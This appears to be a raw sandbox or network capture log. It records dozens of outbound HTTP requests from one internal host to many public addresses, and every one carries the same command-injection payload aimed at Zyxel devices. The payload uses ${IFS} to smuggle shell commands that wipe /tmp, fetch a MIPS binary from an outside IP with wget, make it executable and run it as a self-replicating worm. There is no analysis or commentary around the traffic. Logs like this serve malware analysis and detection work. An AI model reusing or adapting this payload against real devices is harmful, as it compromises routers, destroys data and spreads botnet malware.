                              Mar 31, 2024 08:41:05.506795883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              834192.168.2.13418869.232.208.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506820917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              835192.168.2.1349084112.233.100.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506870031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              836192.168.2.1349982147.2.235.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506911993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              837192.168.2.133521259.91.249.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506947994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              838192.168.2.133281654.181.12.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.506984949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              839192.168.2.1346470164.193.20.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507011890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              840192.168.2.133731053.242.87.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507061005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              841192.168.2.1360258180.52.167.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507107019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              842192.168.2.1357838180.206.38.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507128954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              843192.168.2.1335208115.4.53.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507163048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              844192.168.2.135165641.205.176.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507215023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              845192.168.2.1334076131.72.74.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507246971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              846192.168.2.134466692.42.9.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507297993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              847192.168.2.134759684.59.128.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507348061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              848192.168.2.1336024131.145.255.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507401943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              849192.168.2.133439618.12.96.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507437944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              850192.168.2.133301074.58.5.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507473946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              851192.168.2.1335444109.210.180.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507514954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              852192.168.2.1334798148.207.80.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507559061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              853192.168.2.1340004124.199.51.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507587910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              854192.168.2.134059653.41.116.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507600069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              855192.168.2.1338424163.39.34.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507656097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              856192.168.2.1352890100.213.71.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507683992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              857192.168.2.1339198137.134.72.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507733107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              858192.168.2.1360130204.175.234.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507774115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              859192.168.2.1348270139.99.225.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507813931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              860192.168.2.135979444.5.142.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507868052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              861192.168.2.1348216212.166.248.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507900000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              862192.168.2.1350638185.134.255.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507927895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              863192.168.2.134126034.179.217.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.507967949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              864192.168.2.134649479.54.83.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508004904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              865192.168.2.134686819.87.158.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508021116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              866192.168.2.1357056144.29.41.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508085012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              867192.168.2.1358066197.38.201.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508127928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              868192.168.2.1337230223.143.246.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508141994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              869192.168.2.1345058120.219.30.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508194923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              870192.168.2.1351240148.183.186.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508234978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              871192.168.2.1354498117.24.170.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508272886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              872192.168.2.135580880.139.96.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508327007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              873192.168.2.1351840193.128.168.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508358002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              874192.168.2.1338244146.87.42.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508383036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              875192.168.2.1351860186.128.28.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508455038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              876192.168.2.134635613.148.164.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508501053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              877192.168.2.134779079.194.94.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508544922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              878192.168.2.1360944144.85.248.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508582115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              879192.168.2.1336018201.228.173.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508637905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              880192.168.2.1343132109.193.30.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508676052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              881192.168.2.135350025.70.27.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508699894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              882192.168.2.1348354184.137.184.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508759975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              883192.168.2.1337832197.161.92.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508788109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              884192.168.2.1344778222.243.101.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508830070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              885192.168.2.1348116175.250.193.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508858919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              886192.168.2.1358492139.8.149.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508879900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              887192.168.2.1346440202.50.103.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508903980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              888192.168.2.133704412.81.208.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508941889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              889192.168.2.135830624.214.69.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.508980989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              890192.168.2.1350454145.52.248.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509036064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              891192.168.2.1354912203.58.151.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509049892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              892192.168.2.133710089.241.95.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509104013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              893192.168.2.1348070201.172.169.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509139061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              894192.168.2.1350900148.245.123.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509157896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              895192.168.2.135944464.95.63.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509196997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              896192.168.2.133959859.6.30.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509254932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              897192.168.2.135282265.34.69.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509299994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              898192.168.2.134942688.116.90.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509330988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              899192.168.2.1359788133.76.167.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509342909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              900192.168.2.1353206118.20.52.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509363890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              901192.168.2.1346398223.236.66.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509402037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              902192.168.2.135003247.141.13.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.509426117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
